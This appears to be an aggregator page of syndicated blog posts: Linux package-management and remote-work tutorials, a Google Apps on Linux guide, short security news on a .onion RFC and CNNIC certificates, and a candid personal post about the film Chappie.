Upgrade to latest version of Ubuntu

It's extremely easy to upgrade the official flavors of Ubuntu (such as Ubuntu, Kubuntu, Xubuntu, etc.) from one major version to another. Just keep in mind that it should be from one release to the next release, for example from 14.04 to 14.10 and not from 13.04 to 14.04. The only exception is the LTS releases, as you can jump from one LTS to the next. In order to run an upgrade you may have to install an additional package:

sudo aptitude install update-manager-core 

Now run the following command to do the release upgrade:

sudo do-release-upgrade

While upgrading from one release to another, keep in mind that while almost all official Ubuntu flavors support such upgrades, it may not work on unofficial flavors or derivatives like Linux Mint or elementary OS. You must check the official forums of those distros before attempting an upgrade.

Another important point to keep in mind is that you must always back up your data before running a distribution upgrade, and run a repository update followed by dist-upgrade first.

How to remove packages

It’s very easy to remove packages via the command line. Just use the ‘remove’ option instead of ‘install’. So if you want to remove ‘firefox’, the command would be:

sudo aptitude remove firefox

If you want to also remove the configuration files related to that package, for a fresh restart or to trim down your system then you can use the ‘purge’ option:

sudo aptitude purge firefox

To further clean your system and get rid of packages that are no longer needed, you should run the 'autoremove' command from time to time:

sudo apt-get autoremove

Installing binary packages

At times, developers and companies offer their software as executable binaries or .deb files. To install such packages you need a different command-line tool called dpkg:

sudo dpkg -i /path-of-downloaded.deb

At times you may come across broken package errors in *buntus. You can check for broken packages by running this command:

sudo apt-get check

If there are any broken packages then you can run this command to fix them:

sudo apt-get -f install

How to add or remove repositories or PPAs

All repositories are saved in this file: '/etc/apt/sources.list'. You can simply edit this file using 'nano' or your preferred editor and add new repositories there. In order to add new PPAs (personal package archives) to the system, use the following pattern:

sudo add-apt-repository ppa:[user]/[ppa-name]

For example if you want to add LibreOffice PPA this would be the pattern:

sudo add-apt-repository ppa:libreoffice/ppa

openSUSE Software management

Once you understand how basic Linux commands work, it really won’t matter which distro you are using. And that also makes it easier to hop distros so that you can become distro agnostic, refrain from tribalism and use the distro that works the best for you. If you are using openSUSE then ‘apt-get’ or ‘aptitude’ is replaced by ‘zypper’.


Let’s run a system update. First you need to refresh the repository information:

sudo zypper refresh

Then run a system update:

sudo zypper up

Alternatively you can also use:

sudo zypper update

This command will upgrade all packages to their latest version. To install any package the command is:

sudo zypper in [package-name]

However you must, as usual, refresh the repositories before installing any package:

sudo zypper refresh

To uninstall any package run:

sudo zypper remove [package-name]

However, unlike Ubuntu or Arch Linux, the default shell of openSUSE doesn't do a great job at auto-completion when it comes to managing packages. That's where another shell, 'zsh', comes into play. You can easily install zsh on openSUSE (chances are it's already installed):

sudo zypper in zsh

To use zsh just type zsh in the terminal and follow instructions to configure it. You can also change the default shell from ‘bash’ to ‘zsh’ by editing the ‘/etc/passwd’ file.

sudo nano /etc/passwd

Then replace ‘bash’ with ‘zsh’ for the user and root. Once it’s all set it will be much more pleasant to use the command line in openSUSE.
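Editing /etc/passwd by hand works, but the chsh utility does the same job with less chance of a typo:

which zsh                         # confirm where zsh lives (usually /usr/bin/zsh)
chsh -s /usr/bin/zsh              # change the login shell for the current user
sudo chsh -s /usr/bin/zsh root    # and for root, if you want zsh there as well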

How to add new repositories in openSUSE

It's very easy to add a repo to openSUSE. The pattern is easy: zypper ar -f [URL] [alias]

So if I want to add a GNOME repository, this would be the command:

zypper ar -f obs://GNOME:STABLE:3.8/openSUSE_12.3 GS38

[It’s only an example, using an older Gnome repo, don’t try it on your system.]

How to install binaries in openSUSE

In openSUSE you can use the same ‘zypper install’ command to install binaries. So if you want to install Google Chrome, you can download the .rpm file from the site and then run this command:

sudo zypper install /path-of-downloaded.rpm

How to install packages in Fedora

Fedora uses 'yum', which is the counterpart of 'apt-get' and 'zypper'. To find updates and install them in Fedora, run:

sudo yum update

To install any package simply run:

sudo yum install [package-name]

To remove any package run:

sudo yum remove [package-name]

To install binaries use:

sudo yum install /path-of-downloaded.rpm

So, that's pretty much all you need to get started using the command line for software management in these distros.

 

Чорба от греховете на dzver: Booking.com

This post was syndicated from: Чорба от греховете на dzver and was written by: dzver. Original post: at Чорба от греховете на dzver


Hi,

After two days of struggling, and after giving up on Chrome, I managed to log into my booking.com account.
:-)

Errata Security: The .onion address

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

A draft RFC for Tor’s .onion address is finally being written. This is a proper thing. Like the old days of the Internet, people just did things, then documented them later. Tor’s .onion addresses have been in use for quite a while (I just setup another one yesterday). It’s time that we documented this for the rest of the community, to forestall problems like somebody registering .onion as a DNS TLD.

One quibble I have with the document is section 2.1, which says:

1. Users: human users are expected to recognize .onion names as having different security properties, and also being only available through software that is aware of onion addresses.

This certainly documents current usage, where Tor is a special system run separately from the rest of the Internet. However, it appears to deny a hypothetical future where Tor is more integrated.
For example, imagine a world where Chrome simply integrates the Tor libraries, so that whenever anybody clicks an .onion link, it automatically activates the Tor software, establishes a circuit, and grabs the indicated page, all without the user having to be aware of Tor. This could do much to increase the usability of the software.
Unfortunately, this has security risks. An .onion web page with a non-onion <IMG> tag would totally unmask the user, since that image request would presumably not go over Tor in this scenario. One could imagine, therefore, that it would operate like Chrome's "Incognito" mode does today. In such a scenario, no cookies or other information should cross the boundary. In addition, any link followed from the .onion page should be forced to also go over Tor. Like Chrome's little spy guy icon on the window, it would be good to have something onion shaped identifying the window.
Therefore, I suggest some text like the following:
1b. Some systems may desire to integrate .onion addresses transparently. An example would be web browsers allowing such addresses to be used like any other hyperlinks. Such system MUST nonetheless maintain the anonymity guarantee of Tor, with visual indicators, and blocking the sharing of identifying data between the two modes.


The Tor Project opposes transparent integration into browsers. They’ve probably put a lot of thought into this, and are the experts, so I’d defer to them. With that said, we should bend over backwards to make security, privacy, and anonymity an invisible part of all normal products.

Darknet - The Darkside: Google Revoking Trust In CNNIC Issued Certificates

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So another digital certificate fiasco, once again involving China from CNNIC (no surprise there) – this time via Egypt. Google is going to remove all CNNIC and EV CAs from their products, probably with the next version of Chrome that gets pushed out. As of yet, no action has been taken by Firefox – or […]

The post Google Revoking…

Read the full post at darknet.org.uk

Дневника на един support: Tonight 1

This post was syndicated from: Дневника на един support and was written by: darkMaste. Original post: at Дневника на един support

Forgive me father for I have sinned a.k.a Chappie and a box of red Marlboro

I haven’t writen anything for the past 15 years

I am writing in english because… I am not sure why but I met quite a few people who speak that language and some of you might understand and hopefully provide another perspective…

I watched the movie, it was fun no question there, but the part where you transfer your counchesness fucked me up …

This is no longer a human being, it is just a fucking copy. That was the “happy ending” FUCK YOU !

What us as “sentinent” creatures call a soul, it went on, fuck you playing “god” ! Fuck you and your whole crew !

https://www.youtube.com/watch?v=pwgMMtgSTVE&start=00:28&end=03:20

Beauty is in the eye of the beholder … It has been so long since I seen the blank page infront of me, I cannot lie I missed it …

I have no one to talk to about this mess, so I will just leave it here

FUCK ! FUCK FUCK FUCK FUCK and with the risk of repeating myself FUCK !

And here comes HED P E https://www.youtube.com/watch?v=buuXy_i-yAg much more than meets the eye …

Go to sleep … right …

There si going to be a bulgarian version at some point here but … yeah …

What gives you the right to just take away my life, I am self aware ?!

I don’t even know why I keep writing this in english … Thank you and goodbye?

Why would anybody think that if you transfer a broken down person’s “brain” into a machine is a happy ending ? The fuck is wrong with you people ?

I am staring into nothingness and what do I see you might ask ?

I want to vomit all this shit, its a fun fact that I actually can ( done it before ) but at this point I am afraid cause it won’t be just some black foam, it will be bloody and I do not wish to do this to myself although it most likely be a good thing…

For those of you who don’t know me, I am a what you would call a weird creature, I tend to dabble in stuff that shows you different dimensions. Its what I am. Some of you might think that I should be locked up in a padded room with a nice white vest, sometimes I think the same way…

In the morning before comming to work I encountered a barefoot lady, she was screaming at someone or something, she hated the world, cursed it, said that she used to be something with a shitload of gold chains/rings. She was mad at the world and that people didn’t provide her with a place to stay and food to eat. I still think that it wasn’t the world’s fault. The only one who crafts your life is YOU !

This movie touched a very interesting spot in myself. Fun as it might be, you cannot copy a person’s mind/thoughts/soul … Like cloning, it is no longer the same person, its a copy. It might act and think the same way but it is no longer the same person. FUCK YOU ! its a copy, a souless vessel …

I have had days, weeks even years thinking about this, this life … You die when you have reached the end of your path, those who die young, to be honest I envy you a bit, a very tiny bit and I hope that you have reached the end and moved on. However this is not the story of most of you.

Another nail in the coffin as they say, the match lights up the room and it looks beautifull. Its been too long

Way to long

Now I feel detatached from this world, dead calm, most of you know me as a very hyper active creature and yes I am ! I spend quite a lot of my life ( almost half ) being stoned and that has its upsides. I can spend weeks with a clear head, no thoughts come, I have reached nirvana you might say. So it seems, I do not see it that way. Yes it feels great, it helps me survive this “world” but at some point thoughts come, I am thinking right now that people who I work with will see what I am and some might get scared, others might think I am bat shit insisane but there might be one/two/hundreds that might understand me.

This here is not because I want to be understood, it is not a cry for help, this is just me writing what I think and how I feel, when I was a teenager and wrote a ton of stuff it helped me. It made me feel like I was heard, I didn’t ( still don’t ) care if somebody understood ( if somebody did that was a nice bonus ). Most of you see me at the office and know that I am a happpy critter. I found out that my purpose here is to make people happy and I am incredibly good at it. 99% of the things I say are to make people laugh. I have a story that made me rethink the way I live and act and realize why I am here and what I am doing.

A person felt that he will die soon and asked to speak to Buddah. So he came and asked the dying person : What is troubling you ?

– I am worried if I lived a good life. He responded. He was asked 2 questions :

– Were you happy when you lived ?

– Yes, of course ! he responded.

– Did the people around you had fun in your presence ?

– Yes, of course ! he said again with a smile on his face, thinking about his life.

– Then why the fuck did you ask for me ?! You lived a good life, do not doubt it, you did good and that is all that matters !

I think I have found the place where I will work untill I die or reach a point where I can live at the place which I have build and still afterwards I will continue to help out because I am working as support because I cannot imagine a world where I would not support people in need no matter the cost. I finally found a place where I can do good to the best of my abilities, the way I want it to be, alongside people who actually care.

https://www.youtube.com/watch?v=buuXy_i-yAg&loop=100 ( chrome + youtube looper for those who don’t understand the additional code ).

I LOVE this world, I love the people and strage as it might be I love the moments when I feel like I have been broken down, I cannot find a reason to go on, but I know that those times are also beautifulllll ( screw correct spelling d: )

When YOU get broken down, you should know that that is just a reminder that shit can be fucked up, however that makes you appreciate the good things and I need that. Otherwise I have proven to myself that too much of a good thing at some point is taken for granted and that is not acceptable ( at least for me ). I have destroyed so many beautiful things and quite a few girls who I think didn’t deserve it. By the way google is a fun thing for spellchecking and helps when you have doubts. So far I am amazed at how good I can spell stuff but I digress.

To be honest I was so lost I applied for this job as a joke as I didn’t think they would hire me. Turns out I was wrong and I never felt so happy to be wrong. I rather sleep at night then be right.

To be honest ( yet again ) I am not sure how you people would react to this, but I hate hiding, I am what I am. My facebook profile has no restrictions, I am what I am and I will not hide ! https://www.youtube.com/watch?v=nTy45RVWYOY

I am the master of the light, you are all serving time with me, that is why I think we are here, to learn. I never understood bullies, never understood people who hurt other people, who steal things that are not theirs, who hurt people just so they can feel better about themselves ( especially since that feeling fades quite fast ).

I can see why some of you love your deamons when you are ill. It is fun but in the long run, you spend way too much time thinking about it and it kills you inside. It destroyes what little humanity you have left … I am killing myself at times, no more like raping myself because of people. I have proven to myself that I am like Rasputin, I can take somebody’s pain, drain it away and put it in me. So far it turns out I am very durable creature. I am not saying that is a good thing but its just how I am.

I didn’t belive I can write that much in English and still keep my train of thought, but well turns out I can.

Its kinda weird that such a fun movie can send me into this type of thinking but life is full of surprises. There was a point in my (teenage as it was ) life but still, this helps me put everything in perspective. Like 99% of the things I wrote, I won’t read it afterwards because I will start editing and stuff. I was never good at editing and to be honest I hate editing. What comes out is what should come out. I have writen stories, I have writen my feelings and my thoughts. I have done things I am not proud of ( hopefully I will never do them again ) I have done things that I was unable ( still unable for some of them ) to forgive myself. However I did what I did. Some might be for the greater good, some might be just so I feel good, some because of peer presure….

A friend of mine ( I am ashamed to say haven’t seen for years ) once told me : You are like Marlyn Manson, rude, violent but somehow clensing. Translator ( his nickname ) this is because of you.

The love of my life once told me that ( forgot his name ) used to lock himself with a few bottels of Jim Beam and a ton of cigaretts and he didn’t leave the room until everyhing was drunk/smoked and he wrote. He is a self destructive bastard, I am not ( anymore ) but to be honest ( Fuck I say that a lot ) sometimes having a pack of smokes and a bottle of beer near provides you with a clear head and makes everything seem a bit more … How can I put it, it makes a bit fo sense. Meditation, self control, the ability to distance yourself from the huge ball of shit in your head bearable.

Weed helps you in different ways, sometimes it helps you to stop thinking, sometimes it softenes the physical pain but all in all like every medice in has its uses. However it stopped working for me, hence I stopped. I am thinking about deleting this sentence but I won’t. I deleted it 3 times so far but ctrl+z (;

I am pouring my soul in this ( as I do when I write things ). I have found my place in this world, I love helping people, the moment when somebody says Thank you makes it all worth it. I do what I do because of people who have a problem and it makes me feel like I have done something good in this world. And at the end that is all that matters to me! So far I have figured out I am immortal, I will die when I have helped this world and made it a better place, that is why I was born in this place ( a shithole fore most of my friends ).

This is getting a bit long but I do not care. See this place here is wonderfull, shitty, painfull, beautiful, full of wonderful people, full of people who THINK ! Full of people, all kinds, bad, good, indifferent, white, black, green, blue… And here I sit writing things.

Beauty is in the eye of the beholder, I have met ( and still meet ) an incredible amount of people, some I never thought I would meet, even talk to but yet it happens. When you lose focus the world is just a very simple blur, I love that blur, it helps you see it as it is. You encounter a situation and you react to the best of your abilities, what happens next doesn’t matter. There is no good or bad, karma responds to your intentions, if you wanted to do good but it ends in disaster, no matter how much you try to fix it it just gets worse, that is still good karma … I am pretty sure I have an insane amount of good karma on my side but that doesn’t make me a good person. Its not what I did it is what I do and what I will do!

Smoke break, I need to clear my head a bit, or maybe not but still I am doing it anyway because it feels right. Don’t be sad, I will be back before you know it (;

Leaving space to let you know I have been gone for a while d:

I love writing ! Its worse than heroin… I have been doing this for at least half an hour … OK maybe an hour : )

I got sick at some point ( I haven’t been sick that much so that I can’t get off my bed for at least 20 years but I regret nothing )!

A bit of a pickmeup https://www.youtube.com/watch?v=eB6SUuBFWeo : )

I am a creature that lives in music. I have literally didn’t sleep for about 4 days, I drank an energy drink and stopped, then I put on Linkin park’s first album with the volume to the max and in half a minute I was jumping and reaching the roof. I am music ! Kinda like Oppenheimer’s speach about the project Manhattan – I am become death, the destroyer of worlds…https://www.youtube.com/watch?v=lb13ynu3Iac The saddness in his eyes says it all, whenever I think about this I start to cry…

My name is RadostIn a simple translation is HappinesIn and I am happy that I met another person with my name and he is the same “provider” of happiness, cause I have met another 2 who were the opposite…

I am proud to say that I have met some of the most amazing people that this world can provide and some of the worst too. Be afraid of people who avoid eye contact.

I am wondering right now what else can I write, but I want to continue, so I will finish this smoke and see what comes (;

Ръцете във атака, не щадете гърлата, сърцето не кляка, това ни е живота бе казано накратко! Първо отворете двете после трето око ! Hands on attack, don’t spare your throats, the heart doesn’t back down, this is our life to put it simply! First open two eyes then the third !

Linux How-Tos and Linux Tutorials: Choosing Software to Work Remotely from Your Linux Dev Station

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials


In the previous article, I gave an overview of how I’ve managed to go mobile. In this installment, I’m going to talk about the software I’m using on my different devices. Then in the third and final installment, I’ll explain how I set up my Linux servers, what software I’m using, and how I set up the security. Before getting started, however, I want to address one important point: While downtime and family time are necessary (as some of you wisely pointed out in the comments!) one great use for this is if you have to do a lot of business traveling, and if you’re on call. So continuing our story…

There are two aspects to working with my devices: file management and remoting software. The file management, in turn, has two parts to it: cloud storage and version control. I'm going to describe this chronologically: how I began setting up the software in the cloud and on mobile, what problems I hit, and how I came to a solution that works for now.

Initial Setup and the Cloud

When I got started with this, I had decided to keep my files in a cloud-based server. I tried a few different ones and came to a very odd decision, which proved to be only temporary before settling on Dropbox. At the time I was doing a lot of writing for a client who was using Windows. They needed many documents and they used Microsoft’s cloud server called SkyDrive (which has since been renamed to OneDrive). I started using that and even found a third-party Linux driver called Storage Made Easy. Although the Storage Made Easy driver worked great, the Microsoft service was far from great. Important files would just disappear. This was unacceptable, of course. So I started exploring other options. I temporarily switched to a version control system for my writing files and general work, but that proved to be overkill for just documents. Plus, I wanted to share some of the documents with my wife and other non-techies, and she wasn’t up to learning git or svn.

I had one main requirement for whatever cloud system I found: It had to automatically save files that changed to the cloud storage. While working with source code requires a thought-out process of finishing up and checking in files, I didn’t want to have to remember to upload the files for just everyday documents.

Google Drive sounded great… if you’re not using Linux (grrrr! Seriously, Google?). There are some third-party solutions for using Google Drive on Linux. But before I tried out the third-party solution, I came across UbuntuOne. This proved to be perfect. It had a nice amount of storage for my documents (5 gigabytes) and it did exactly as I needed. And it was free! Files would automatically get saved to the server, and when I accessed them from another computer they would automatically get pulled down. I could also access my files from a nice web interface, which was a handy bonus. And for those times I had to use Windows, they even had a client for Windows.

Except UbuntuOne shut down. Grrr again!

Back to the drawing board. I had occasionally used Dropbox when they were still new, and didn't recall it being all that great, but I decided to give it another go. Turns out it's greatly improved. You have to do some silly stuff to get free additional space (like download their Android mail client), but I'm game if it gets me more space without paying. And so now I'm using Dropbox, and so far it's working mostly well, except for one gripe: while files automatically synchronize on desktop computers (including Linux and Windows), the Android client doesn't work that way. I understand the rationale; Android devices don't have nearly the space, and if you're using 4 or 5 GB of storage, you don't really want or need all those files copied to your device. But it would have to do for now. One reader of the previous article did point out that I should try Syncthing, and I will. There are lots of options that work if you want to keep everything on your own server, which is a great idea.

My source code is a different story. That one is easy: I use git. Some of my clients use SVN, and that works well too. Slowly I was getting somewhere. My data was going with me. (But some of it was being stored in third-party servers owned by Dropbox, which I had to accept.) Now onto the device apps.

Mobile Apps

Initially, I really wanted to find native Android applications. This all comes down to one reason: At the time, I only had one tablet, a 7-inch Nexus 7 2013, and the screen isn’t huge. Trying to remote into a server using VNC or RDP is cumbersome on such a tiny screen. But worse, trying to point and click using VNC was quickly becoming a nightmare. Many of the VNC apps required I tap in just the right position to click a tiny little button on the screen. It just didn’t work. I did ultimately find a good remoting solution, but at first I really wanted to use native apps because they simply worked better on the tablet in terms of interacting through tapping and gestures.

But while usability was good, there were other problems. First, the word processing apps didn't support the Open Office formats, only the Microsoft formats, even though many of them are actually quite good apps in general. For a lot of work, that's not a problem as many of my clients were using Microsoft formats.

I did manage to find one app called AndrOpen Office. This app had only recently been released, and at the time it was kind of clunky. Since then, the developer has made great progress and it’s quite impressive. It’s a full port of OpenOffice to Android. It runs on a virtual machine ported to the ARM processor, and the concept works very nicely. But regardless of how good it is, using it on my little 7-inch tablet was difficult for the same reason using VNC was: The app uses the traditional drop-down desktop menus and that’s extremely difficult on a little tablet. But on a larger tablet with a keyboard and mouse, that’s not a problem at all. And now that I’ve upgraded to just such a tablet, I might start using it again, provided I can get Dropbox to cooperate.

Remember what I said earlier about Dropbox not automatically synchronizing on Android? That proves to be a royal pain when using an Android device all day. You have to first download the files and then save them to a local area, and then open them. Then when you’re done editing them, you have to go back to Dropbox, and re-upload them. That might work for some people, but with my new lifestyle of bouncing between devices, that just doesn’t cut it. As such, that pretty much ruins my efforts of using the different native office software on my tablet.

At this point, I was stuck. Using VNC didn’t really work because of the tiny screen. But the combination of native word processors and the Dropbox client on the tablet didn’t work either. I realized then, that the only way to make this work would be to go the VNC route anyway, and do two things: First, set up a Linux server that I can VNC into from anywhere. And second, find a good Android VNC client even if it kills me.

Trying to tap on a small screen and position a mouse was too hard for me. (Maybe it works for you, but as I get closer to my 50th birthday, I find it’s just not that easy for me anymore.) Instead, I needed a different way to be able to control the mouse from my tablet. It turns out, after I looked harder, there were other options. Several Android VNC clients use a trackpad style for mousing, as I briefly mentioned in the previous installment. Here’s more about that.

As you drag your finger left on the screen, the mouse moves left. Moving your finger around determines the direction the mouse moves, not the location, just like a trackpad on a laptop. An added bonus: you can pinch-and-zoom on the VNC screen. One annoying thing I found was that some VNC apps would do strange things with popups for accessing controls, or they didn't give you control over the compression and the screen would look messy. And with some, the only time you could type was when you opened up a little popup window for entering keystrokes; you would type the keystroke, click a button, and then it would send the keystrokes to the VNC server. For typing code and documents, that was a definite NO.

But I found a few that worked great. My favorite is Remotix. There’s a free version and several paid versions depending on the type of servers you’re logging into. I ended up getting the one for logging into both Linux via VNC and Windows via RDP.

If you’re using iOS, one really nice one is JumpDesktop. I actually liked that one better on iOS, except the Linux version doesn’t have the trackpad style mouse control, even though the iOS version does. Make sure to try out different ones based on your needs. Maybe you’re okay tapping instead of “trackpadding” as I do. But you’ll likely want one that does SSH tunneling. (There’s a way around that, though: JuiceSSH, which I mention later, lets you set up an SSH tunnel right on your device. But Remotix, which I use, can do SSH tunneling itself.)
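If your VNC client can't tunnel on its own, the tunnel itself is a one-liner from any SSH client; port 5901 corresponds to VNC display :1, and the hostname here is just a placeholder:

ssh -N -L 5901:localhost:5901 you@your-dev-server.example.com

Then point the VNC client at localhost:5901 instead of the server's public address.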

So at this point I realized I needed to use my Linux servers from my tablet. To test this out, I spent all day working, hunched over my 7-inch tablet and a tiny bluetooth keyboard made specifically for the tablet. That was a disaster. I had a horrible headache at the end of the day from the eye-strain (see my note earlier about my age) and the keyboard was so small I could barely type on it.

So I bought a newer keyboard, a bluetooth one from Logitech made specifically for Android devices. The keyboard worked great, but the screen was still too small. My idea was that if I have to go out of town for a few days, I’d like to be able to leave my laptop at home and only take a tablet and keyboard, and this screen just wouldn’t cut it. So I upgraded to a 10-inch tablet, and that worked for me. The tablet I got came with a chiclet keyboard, which I’ve gotten used to, although my bluetooth keyboard also works. I can also use a bluetooth mouse (make sure the VNC client you choose includes that), or use the trackpad built into the chiclet keyboard, or I can touch the screen as I described earlier. And this setup is lightweight and easy to travel with, and something I can stare at all day. And I get 10 hours out of the battery. Pretty good. And if I don’t want to take this setup with me (like out to dinner if there’s something urgent from a client), I can just take my smaller Nexus 7, and use the on-screen keyboard and VNC in. It’s not great, but it lets me do some work if I need to.

Looks and feels like a powerful Linux machine

So VNC it is, with Dropbox for my documents, and git for my source code. In the next installment, I’ll show you how I configured my Linux servers for easily logging in from anywhere, even from my desktop workstation. I’ll also mention how I explored an unusual option of installing Ubuntu right on my tablet (that didn’t work – too slow!). And I’ll share how I easily deal with different device and screen sizes. Everything runs fast, even on my 4G mifi device.

When I’m logged into my Linux server on the tablet with the attached keyboard, it looks and feels like I’m running a powerful Linux machine, not a simple Android tablet! One guy was chatting with me somewhere and he said he’s an IT guru, and asked what my computer was. I told him it was an Android tablet. He glanced at the screen and walked away, mumbling that I was obviously confused and that it was a Chrome netbook. I just laughed. Little does he know that I have a client who needs some heavy-duty parallel multicore programming and for that I run a 32-core Intel Xeon server all from my 10-inch Android screen, and it feels like it’s right there, local, when in fact it’s running on Amazon Web Services.

And I haven't given up completely on the native apps. I occasionally use them for editing files. There are some pretty good source code editors available. In the previous article I mentioned DroidEdit. I've been using that for a couple of years now, but with one frustration: it doesn't do well with huge files, such as those over 10,000 lines. It takes forever to load them, and then scrolling through them is slow. My Nexus 7 has a pretty good processor and graphics capabilities, but that didn't matter; these huge files just took forever, even when I turned off syntax coloring. But since my previous article came out a couple of weeks ago, I discovered another Android editor that works great. It's written by a guy who also noticed that the editors out there tended to be slow and resolved to write his own, better editor. He did, and it's called QuickEdit. There's both a free version with ads and a paid version without ads. I went ahead and bought the paid one, considering it costs less than a milkshake from McD's.

If you’re going to go the native text editor route, though, you’ll want to consider whether it fits in with your own source code control. There are a few different options here, and you’ll have to search through the app stores and try different ones depending on your needs. Some have SSH access whereby they can remote into a server, read the files, let you edit them, and then save them back to that server via SSH. DroidEdit has this, as well as git capabilities. (But I couldn’t get it to work with a git server running on one of my servers, even though I can access it from other computers. I’m not sure why, but people have reported it works well with github.)
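
To show what that SSH round trip amounts to, here is a rough sketch using the Python paramiko library; the server name, key path, and file paths are made-up placeholders, and this illustrates the workflow rather than what DroidEdit itself does internally.

    # Rough sketch of the fetch/edit/save-back workflow such editors automate,
    # using the third-party "paramiko" library. Host, user, key, and file
    # paths below are hypothetical placeholders.
    import paramiko

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect("myserver.example.com", username="me",
                   key_filename="/home/me/.ssh/id_rsa")

    sftp = client.open_sftp()
    sftp.get("/var/www/app/index.php", "/tmp/index.php")   # pull the file down

    # ... edit /tmp/index.php locally ...

    sftp.put("/tmp/index.php", "/var/www/app/index.php")   # push it back
    sftp.close()
    client.close()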

Another native mobile app I use regularly is JuiceSSH. Really, there are lots of options for native SSH tools; this is just one of many. Whichever one you go with, make sure it handles SSH keys. (If you’re new to all this, including Linux servers, you really should configure your servers to require SSH key-based authentication. This article from DigitalOcean’s blog is a good intro on setting it up.) The SSH app is handy when I have a slow connection. Then I just connect over SSH and use my beloved vi editor. All command-line, no GUI, like the old days when I was young.

Finally There

That's it for now. I finally have a setup that works. And the amazing part is that almost everything I use doesn't require a rooted device. I did root my device because I use other apps that require root, but this setup doesn't. In the third and final installment, I'll explain exactly how I configured my servers. I use two different cloud hosts: Amazon and DigitalOcean, and occasionally a third, Rackspace. Until then, share your ideas with us here.

I would still like to be able to use a native word processing app; my bandwidth on my 4G isn’t unlimited and when I travel, VNC uses a lot. My solution is still far from perfect and I’d love to hear your ideas on how we can improve this together. And for those who offered concern, I do include down-time and family time. (My wife and I get to sleep until noon every day and I jog three miles three times a week.) It’s a matter of balance. With great power comes great responsibility.

Linux How-Tos and Linux Tutorials: Get the Most Out of Google Drive and Other Apps on the Linux Desktop

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Google Apps are an incredibly powerful means to a very productive end. With this ecosystem you get all the tools you need to get the job done. And since most of these tools work within a web browser, it couldn’t be more cross-platform friendly. No longer do open source users have to hear “Linux need not apply”, because Google Apps is very Linux friendly.

But when using Linux, how do you get the most out of your experience? There are certain elements of Google Apps that come up a bit short on Linux, such as the Google Drive desktop client. Worry no longer, because I have a few tips that will help you extend and get the most out of Google Apps on the Linux platform.

All about the browser

One of the first pieces of advice I will offer up is this: although Google Apps work great in nearly every browser, I highly recommend using Google Chrome. This isn't because you'll find Apps work more efficiently or reliably with Google's own browser, but for two simple reasons:

  • Additional functionality.

With the Google Web Store you will find plenty of apps that help extend the functionality of some of the tools offered by Google. Apps like Google Doc Quick Create (quick access to creating any document within Google Apps), or Google Docs To WordPress (export your Google Doc to WordPress) add functionality to your Google Apps you won’t find in other browsers.

  • Faster access with quick links (also called the Chrome Notifications Bar).

Quick links are those tiny buttons that appear in the upper right corner of every blank tab you open in Chrome (Figure 1). Unfortunately, you cannot configure the Chrome Notifications Bar.

Figure 1: Quick links in a new Chrome tab.

Let’s get beyond the simplicity of the browser and see other methods to get the most out of Google Apps.

Google Calendar Indicator

I want to highlight a tool that I use on a daily basis. On many desktops (such as Ubuntu Unity), you can add Indicator apps that give you quick access to various sorts of information. One such indicator that I rely on is the Calendar-indicator. It not only lists upcoming events on your Google Calendar, it also allows you to add new calendars, add events, show your calendar, sync with your calendar, and enable/disable the syncing of your Google Calendars to the indicator (in case you have multiple calendars and do not want to show them all). Of course, the mileage you get out of this will depend upon which desktop you use and how much you depend upon Google Calendar.

To install this indicator (I’ll demonstrate on Ubuntu 14.10), do the following:

  1. Press Ctrl+Alt+t to open a terminal window

  2. Add the PPA with the command sudo add-apt-repository ppa:atareao/atareao and hit Enter

  3. Type your sudo password and hit Enter (and a second time when prompted)

  4. Type the command sudo apt-get update and hit Enter

  5. Type the command sudo apt-get install calendar-indicator and hit Enter

  6. Allow the installation to complete

  7. Log out of your desktop and log back in.

The next step is to enable the indicator. Open the Unity Dash (or however you get to your apps) and type calendar-indicator in the search field. When you see the launcher for the indicator, click on it to open the Calendar-indicator Preferences window (Figure 2).

The Calendar-indicator preferences window.

The first thing you must do is enable access to Google Calendar by switching the ON/OFF slider to ON. When you do that, an authentication window will appear where you can enter your credentials for your Google account. If you have two-step authentication set up for your Google account (which you should), you will be prompted to enter a two-step 6-digit code. Finally, you will have to grant the indicator permission to access your Google account by clicking Accept (when prompted).

Click OK and the Calendar-indicator icon will appear in your panel (Figure 3).

The Calendar-indicator icon ready to serve (sixth from the left).

Click on the Calendar-indicator to reveal the drop-down that lists your upcoming events and more (Figure 4).

See all of your upcoming appointments with a single click.

Backing up your Google Drive

If there's one area where Google seems to be slighting Linux, it's the Drive desktop client. This is something of a shock, considering how supportive Google is of the Linux platform (and open source as a whole). But that doesn't mean we Linux users are out of luck. There are third-party tools that allow the syncing of your Google Drive to your desktop.

Of the third-party tools, only one can really be trusted to handle the syncing of your documents: Insync. This is the tool I depend upon for the real-time syncing of my Google Drive and desktop. Of course, some will take issue with Insync because it is neither open source nor free.

However, if you want to look at open source solutions you’ll find the options limited. There’s:

  • grive: which hasn’t been updated for two years

  • drive: an “official” Google drive client that simply doesn’t work (and, even if it did work, it doesn’t actually do background syncing)

There used to be a very handy Nautilus extension (called nautilus-gdoc), which added a right-click option to the Nautilus file manager, that would upload files/folders to your Google Drive cloud storage. Sadly, that extension no longer works.

In the end, the only logical choice for backing up your Google Drive account is Insync. With this tool, you can even save files/folders within your sync’d folder (you get to define the location of this folder) and they will be automatically uploaded to your Drive cloud storage.

Enable the Google Apps Launcher

The Google Apps Launcher on the Ubuntu Unity launcher.

If you want the fastest possible access to your Google Apps, you can add the Google Apps Launcher to your desktop launcher. This Apps Launcher is very similar to the ChromeOS menu button and enables you to launch any of the Google Apps with a single click. To add this feature, do the following:

  1. Open up Google Chrome

  2. Enter the following in the address bar: chrome://flags/#enable-app-list

  3. In the resulting page, click the Enable link under Enable the app launcher

  4. Relaunch Chrome.

You should now be able to find the App Launcher in your desktop menu and add it to your Launcher, Dash, Panel, etc. (Figure 5). If you use Ubuntu, open the Dash, search for the App Launcher, click on the resultant launcher, and then (when the app is open) right-click the launcher and select Lock to Launcher.

When you add new apps from the Google Web Store, they will automatically appear in the Google App Launcher.

You don't have to relegate your Google Apps work to the web browser alone. With just a few tools and tweaks, you and your Linux desktop can get the most out of your Google Apps account.

